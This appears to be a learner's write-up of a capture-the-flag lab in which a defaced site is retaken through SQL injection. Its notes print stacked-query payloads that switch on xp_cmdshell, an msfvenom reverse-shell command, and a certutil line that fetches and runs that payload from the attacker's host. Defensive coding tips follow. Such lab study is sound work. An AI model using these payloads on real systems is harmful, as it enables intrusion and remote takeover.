The companany website have been hijacked and defaced. The web developers have been locked out of the webserver and it’s up to you to hack back into the server to regain access.
Learning Objectives #
- Learn to understand and identify SQL injection vulnerabilities.
- Exploit stacked queries to turn SQL injection into remote code execution.
- Restore the website and save it reputation.
Overview #
This is my key takeaways from today:
PHPis a server-side scripting language, meaning the code is executed on the webserver before the final HTML is sent to the user.- Most common way for
PHPto connect to a SQL database is using the PHP Data Objects (PDO) extension or specific database server drivers (mysqli for MySQL, sqlsrv for MSSQL). - SQL Injection is when a website fails to secure the input from the user by passing it straight into a query.
- Stacked queries are when you terminate the intended query and executing additional statements in a single injection. (
' ; INSERT INTO blah... - You can with Stacked queries call stored procedures, like
xp_cmdshell. This needs the database user to be a member of the sysadmin or have theALTER SETTINGSserver-level permission to execute the command.
To check for xp_cmdshell:
EXEC sp_confugre 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
This will, in a payload look like this:
http://10.10.61.141/redacted.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
- You can’t see if the above have worked in a browser. To leverage
xp_cmdshellyou can get Remote Code Execution (RCE) usingmsfvenomfrommetasploit.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP LPORT=1886 -f exe -o rev.exe
Spin up a webserver (python -m http.server) and run the following to download the payload.
http://10.10.61.141/redacted.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://YOUR.IP:8000/rev.exe C:\Windows\Temp\rev.exe'; --
Then visiting the newly downloaded executable:
http://10.10.61.141/redacted.php?age'; EXEC xp_cmdshell 'C:\Windows\Temp\rev.exe'; --
You know have a shell on the box!
SQLi, OR 1=1 #
The check for SQLi is often -- - OR 1=1. This can destroy a database if you don’t know the underlying queries.
For example, a query might use values from an initial request in multiple SQL queries. If you use OR 1=1 and this gets passed into a second query that uses UPDATE or DELETE, you can potentially delete an entire table since OR 1=1 is always true.
Instead you can use something safer, like bob' AND 1=2--. This still demonstrates the SQL injection without putting the entire table’s records at risk.
Coding best practices #
- Input validation: Sanitise and validate all user-supplied input to ensure it adheres to expected data types and formats. Reject everything else.
- Parameterised statements: Use prepared statements and parameterised queries in your database interactions.
- Stored procedures: Use SP’s to encapsulate your SQL logic whenever possible. This reduces the risk of SQL injection by separating user input from SQL code.
Questions #
- Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?
Just navigate around the website until you find a webpage where you can Search for gifts.
- Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?
Insert a single quote (') into the age parameter in the URL and look at the Database query error you recieve.
- Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?
Rewrite the URL to 10.10.61.141/REDACTED.php?age='OR 1=1--
- What flag is in the note file Gr33dstr left behind on the system?
After getting a shell,
type C:\Users\Administrator\Desktop\note.txt.
- What is the flag you receive on the homepage after restoring the website?
Run the restore_website.bat file from the Administrators Desktop, then visit the website again in a browser.